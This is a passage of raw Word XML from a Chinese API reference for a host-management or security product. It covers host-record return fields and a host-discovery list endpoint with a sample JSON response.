      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"internalIp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.20.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"externalIp"</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hostName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"ubuntu"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"group"</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groupName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"remark"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server组"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"hostTags"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server-6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</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error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机不在线"</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total"</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charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F07C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1362"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1037"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6192602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C1A88E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5101F814" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5396F719" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7477E783" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477EE153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69971959" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B45042" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="745966C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F9903D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1F538C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD4DE1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BCE0576" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C8F09B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC33E27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3441D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72858399" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B4301F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A6EE34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0D0BAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29EE7FEF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="071674AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0386E080" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="685F4532" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D18DE93" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DAEB576" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72744E33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E8EEAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33CE9CE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E1FA01D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4E7C55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3404B633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4611AD06" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1865B2EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108D9DEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EFEADC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4022B420" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F279460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C73EE82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2691BD95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="121C6496" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6515E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5706166F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F978029" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CCFCE7B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="664B911A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C0A7EA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A93E82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="003CA897" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B310293" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="623C9C97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A5028DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="321C5776" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="主机发现"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="204"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">主机发现 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045422F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="获取主机发现结果"/>
      <w:r>
        <w:t>获取主机发现结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACDF81B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB3FB40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/discoveredhost/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA9F1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037705B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822D95C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9416A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/discoveredhost/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F52AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223A883" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "id": "5fa5219373f7a26f9cfaa5ba",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "macAddr": "00:50:56:E5:B5:D0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "ipAddr": "172.16.5.102",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "deviceType": "host",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "osFamily": "Linux",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "agentId": "5f8fe67e3125215c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "discoveryIp": "172.16.111.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "agentStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "scanMethods": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "tcp_syn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ping"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "firstDiscoverTime": 1604657555,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "lastDiscoverTime": 1604657555,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "osType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "total": 19,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04987C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回rows部分说明</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1847"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="6269"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7D3703E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45AA04A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53C42F84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285FC5E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D0F697F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="429EAE55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C92C9DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0657456F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被发现主机的id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33020059" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
